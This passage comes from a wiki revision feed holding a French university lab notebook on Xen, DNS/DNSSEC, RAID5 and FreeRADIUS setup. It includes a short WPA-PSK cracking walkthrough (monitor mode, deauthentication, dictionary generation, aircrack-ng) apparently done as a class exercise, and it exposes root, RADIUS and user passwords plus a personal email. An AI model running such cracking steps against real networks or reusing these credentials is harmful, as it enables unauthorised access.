 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
         IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
 ns      IN      A       193.48.57.161&lt;br /&gt;
 www     IN      A       193.48.57.161&lt;br /&gt;
 @       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
=Séance6=&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le contenu du fichier serveur.csr dans gandi&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DNSSEC&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-ksk.key&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-zsk.key&lt;br /&gt;
&lt;br /&gt;
 /etc/bind/faispastomberlasavo.net.dnssec# dnssec-signzone -o  faispastomberlasavo.net -k  faispastomberlasavo.net-ksk ../db. faispastomberlasavo.net faispastomberlasavo.net-zsk&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.faispastomberlasavo.net.signed&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:/etc/bind# dig DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 &lt;br /&gt;
 ; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 ;; global options: +cmd&lt;br /&gt;
 ;; Got answer:&lt;br /&gt;
 ;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 10598&lt;br /&gt;
 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
 &lt;br /&gt;
 ;; OPT PSEUDOSECTION:&lt;br /&gt;
 ; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
 ;; QUESTION SECTION:&lt;br /&gt;
 ;faispastomberlasavo.net.	IN	DNSKEY   &lt;br /&gt;
 &lt;br /&gt;
 ;; ANSWER SECTION:&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	257 3 5 AwEAAa3Js66YHVQrw4q+4IKA71lRK9AXWznEZyoxVCxr0SSYx+TFUXxh VTbjq1H8aYjwUa1UyuFsHUC72wJcTNCo0DNOX6Qcek/Y9O30x8xnXRdB OsNFLhnc5v4b5mLTGLswS3GpBCgP8+xSj4LmZPrLZneVom5Q2xCl40KT b5WdpMXXmPjaPOk24gdr5QYzZxrSIqmbEjp2DPaCZiAqPJ8hvvqPFQ+Q Bq53a5/ra3PfN1uo0B2WzeGN0nsb3QDLAREmuovHxSJjm23Yv7rcU8eb txBuOPkbgyES/ybN0uWvW3hiHipXeMCa+yRywnle2Ea56k6w4bcPNta3 8qeF3KwqszE=&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	256 3 5 AwEAAe+I1C2IYzY323K1HXia8curPC+ZduRAiXpsYMdBRyTQOpxTf0zf ulFh42UOPhRCrYm3CZkOesUjhbS0Z3WVzy6u/RHJDRKiqNUbpnBN8jQf mmhIx8FJU3Kcu5st+T6cRWOEoCQIS6tOM31u5I4NKrhXZamDiV361YTQ nJrJNT//&lt;br /&gt;
 &lt;br /&gt;
 ;; Query time: 0 msec&lt;br /&gt;
 ;; SERVER: 127.0.0.1#53(127.0.0.1)&lt;br /&gt;
 ;; WHEN: Mon Nov 28 17:05:19 CET 2016&lt;br /&gt;
 ;; MSG SIZE  rcvd: 476&lt;br /&gt;
&lt;br /&gt;
==Crack clé WPA/PSK==&lt;br /&gt;
&lt;br /&gt;
Tout d'abord il faut passer l'interface réseau en mode &amp;quot;Monitor&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan1&lt;br /&gt;
&lt;br /&gt;
Nous pouvons détecter les hotspots grâce à l'utilitaire airodump-ng&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
Nous voulions trouvé la clé de &amp;quot;cracotte01&amp;quot;, nous avons donc filtré pour le bssid &amp;quot;04:DA:D2:9C:50:50&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w out --bssid 04:DA:D2:9C:50:50 mon0&lt;br /&gt;
 aireplay-ng -0 0 -a 04:DA:D2:9C:50:50&lt;br /&gt;
&lt;br /&gt;
Nous avons créer notre dictionnaire de la façon suivante&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o dico.txt&lt;br /&gt;
&lt;br /&gt;
Que nous avons tester sur une Zabeth par soucis de rapidité&lt;br /&gt;
 &lt;br /&gt;
 aircrack-ng -w dico.txt out-01.cap&lt;br /&gt;
&lt;br /&gt;
Qui nous a donné le résultat suivant&lt;br /&gt;
&lt;br /&gt;
 [[Fichier:Aircrack_screen.png|500px|thumb|center]]&lt;br /&gt;
&lt;br /&gt;
==Travail à Réalisé==&lt;br /&gt;
===6.1 Raid===&lt;br /&gt;
&lt;br /&gt;
Tout d'abord il a fallu créer les disques virtuels avec ''lvcreate'' :&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid1 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid2 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid3 -v&lt;br /&gt;
&lt;br /&gt;
Puis il faut rajouter à la config ''/etc/xen/Frotteman.cfg'' :&lt;br /&gt;
&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid1,xvdd1, w',&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid2,xvdd2, w',&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid3,xvdd3, w',&lt;br /&gt;
&lt;br /&gt;
Une fois ceci fait on redémarre la VM et on installe ''mdadm'' :&lt;br /&gt;
&lt;br /&gt;
 apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
On met à jour les modules du kernel (enfin je crois) :&lt;br /&gt;
&lt;br /&gt;
 apt-get install linux-image.3.16.0-4-amd64&lt;br /&gt;
&lt;br /&gt;
Il ne nous reste plus qu'à créer notre disque RAID5 ''md0'' :&lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
&lt;br /&gt;
Nous installons un système de fichier ''ext4'' dessus:&lt;br /&gt;
&lt;br /&gt;
 mkfs -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant le monter :&lt;br /&gt;
&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour tester nous avons copié en partie le dossier /lib dans /mnt.&lt;br /&gt;
Nous commentons une ligne du fichier /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
 #'phy:/dev/virtual/Frotteman-raid2,xvdd2, x',&lt;br /&gt;
&lt;br /&gt;
Puis nous observons les différents résultats via ''fdisk'' :&lt;br /&gt;
&lt;br /&gt;
 fdisk -l&lt;br /&gt;
&lt;br /&gt;
 Disk /dev/xvdd1: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
 Disk /dev/xvdd3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
 Disk /dev/md0: 2 GiB, 2145386496 bytes, 4190208 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 524288 bytes / 1048576 bytes&lt;br /&gt;
&lt;br /&gt;
On observe l'absence du disque xvdd2 mais nous avons en revanche toutes nos données sur /mnt&lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:~# ls /mnt/lib&lt;br /&gt;
 ifupdown			      libipq.so.0.0.0	    startpar&lt;br /&gt;
 init				      libiptc.so.0	    systemd&lt;br /&gt;
 klibc-IpHGKKbZiB_yZ7GPagmQz2GwVAQ.so  libiptc.so.0.0.0	    terminfo&lt;br /&gt;
 libip4tc.so.0			      libxtables.so.10	    udev&lt;br /&gt;
 libip4tc.so.0.1.0		      libxtables.so.10.0.0  x86_64-linux-gnu&lt;br /&gt;
 libip6tc.so.0			      lsb		    xtables&lt;br /&gt;
 libip6tc.so.0.1.0		      modprobe.d&lt;br /&gt;
 libipq.so.0			      modules&lt;br /&gt;
&lt;br /&gt;
Nous avons même été prévenu via mail par mdadm, c'est bo l'info !!&lt;br /&gt;
&lt;br /&gt;
 From root@faispastomberlasavo.net  Wed Dec  7 17:06:00 2016&lt;br /&gt;
 X-Original-To: root&lt;br /&gt;
 From: mdadm monitoring &amp;lt;root@faispastomberlasavo.net&amp;gt;&lt;br /&gt;
 To: root@faispastomberlasavo.net&lt;br /&gt;
 Subject: DegradedArray event on /dev/md0:Frotteman&lt;br /&gt;
 Date: Wed,  7 Dec 2016 17:05:56 +0100 (CET)&lt;br /&gt;
 &lt;br /&gt;
 This is an automatically generated mail message from mdadm&lt;br /&gt;
 running on Frotteman&lt;br /&gt;
 &lt;br /&gt;
 A DegradedArray event had been detected on md device /dev/md0.&lt;br /&gt;
 &lt;br /&gt;
 Faithfully yours, etc.&lt;br /&gt;
 &lt;br /&gt;
 P.S. The /proc/mdstat file currently contains the following:&lt;br /&gt;
 &lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active (auto-read-only) raid5 xvdd1[0] xvdd3[2]&lt;br /&gt;
       2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
       &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===6.2 Cryptage eeePC===&lt;br /&gt;
&lt;br /&gt;
===6.6 Securasition Wifi par WPA2-EAP===&lt;br /&gt;
 &lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Puis nous avons eu à configurer nos points d'accès wifi au sein du fichier clients.conf, voici à quoi ressemble la configuration d'un des points :&lt;br /&gt;
&lt;br /&gt;
 client E306{&lt;br /&gt;
         ipaddr = 10.60.1.2&lt;br /&gt;
         secret = password&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne restait plus qu'a créer un utilisateur pour ce serveur d'authentification, pour cela nous avons ajouté la ligne suivante dans le fichier users.&lt;br /&gt;
&lt;br /&gt;
 frotteman Cleartext-Password := &amp;quot;youpi&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Une fois cette configuration réalisée nous avons lancé notre serveur FreeRADIUS.&lt;br /&gt;
Configuration des bornes Wi-Fi&lt;br /&gt;
&lt;br /&gt;
Par la suite nous avons réalisé la configuration des bornes Wi-Fi afin d'avoir notre accès sécurisé avec notre serveur FreeRADIUS. La configuation est réalisée en tapant les commandes suivantes après s'être connecté à la borne via telnet :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 &lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_frotteman group radius_frotteman&lt;br /&gt;
 radius-server host 193.48.57.161 auth-port 1812 acct-port 1813 key password&lt;br /&gt;
 aaa group server radius radius_frotteman&lt;br /&gt;
 server 193.48.57.161 auth-port 1812 acct-port 1813&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
 dot11 ssid SSID_FROTTEMAN&lt;br /&gt;
 vlan 2&lt;br /&gt;
 authentication open eap eap_frotteman&lt;br /&gt;
 authentication network-eap eap_frotteman&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 &lt;br /&gt;
 exit &lt;br /&gt;
 &lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
 encryption vlan 2 mode ciphers aes-ccm tkip&lt;br /&gt;
 ssid SSID_FROTTEMAN &lt;br /&gt;
 &lt;br /&gt;
 exit &lt;br /&gt;
 &lt;br /&gt;
 interface Dot11Radio0.2&lt;br /&gt;
 encapsulation dot1Q 2&lt;br /&gt;
 no ip route-cache&lt;br /&gt;
 bridge-group 2&lt;br /&gt;
 bridge-group 2 subscriber-loop-control&lt;br /&gt;
 bridge-group 2 spanning-disabled&lt;br /&gt;
 bridge-group 2 block-unknown-source&lt;br /&gt;
 no bridge-group 2 source-learning&lt;br /&gt;
 no bridge-group 2 unicast-flooding  &lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
 interface GigabitEthernet0.2&lt;br /&gt;
 encapsulation dot1Q 2&lt;br /&gt;
 bridge-group 2&lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
  &lt;br /&gt;
 exit&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35896</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35896"/>
				<updated>2016-12-12T10:10:11Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
         IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
 ns      IN      A       193.48.57.161&lt;br /&gt;
 www     IN      A       193.48.57.161&lt;br /&gt;
 @       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
=Séance6=&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le contenu du fichier serveur.csr dans gandi&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DNSSEC&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-ksk.key&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-zsk.key&lt;br /&gt;
&lt;br /&gt;
 /etc/bind/faispastomberlasavo.net.dnssec# dnssec-signzone -o  faispastomberlasavo.net -k  faispastomberlasavo.net-ksk ../db. faispastomberlasavo.net faispastomberlasavo.net-zsk&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.faispastomberlasavo.net.signed&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:/etc/bind# dig DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 &lt;br /&gt;
 ; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 ;; global options: +cmd&lt;br /&gt;
 ;; Got answer:&lt;br /&gt;
 ;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 10598&lt;br /&gt;
 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
 &lt;br /&gt;
 ;; OPT PSEUDOSECTION:&lt;br /&gt;
 ; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
 ;; QUESTION SECTION:&lt;br /&gt;
 ;faispastomberlasavo.net.	IN	DNSKEY   &lt;br /&gt;
 &lt;br /&gt;
 ;; ANSWER SECTION:&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	257 3 5 AwEAAa3Js66YHVQrw4q+4IKA71lRK9AXWznEZyoxVCxr0SSYx+TFUXxh VTbjq1H8aYjwUa1UyuFsHUC72wJcTNCo0DNOX6Qcek/Y9O30x8xnXRdB OsNFLhnc5v4b5mLTGLswS3GpBCgP8+xSj4LmZPrLZneVom5Q2xCl40KT b5WdpMXXmPjaPOk24gdr5QYzZxrSIqmbEjp2DPaCZiAqPJ8hvvqPFQ+Q Bq53a5/ra3PfN1uo0B2WzeGN0nsb3QDLAREmuovHxSJjm23Yv7rcU8eb txBuOPkbgyES/ybN0uWvW3hiHipXeMCa+yRywnle2Ea56k6w4bcPNta3 8qeF3KwqszE=&lt;br /&gt;
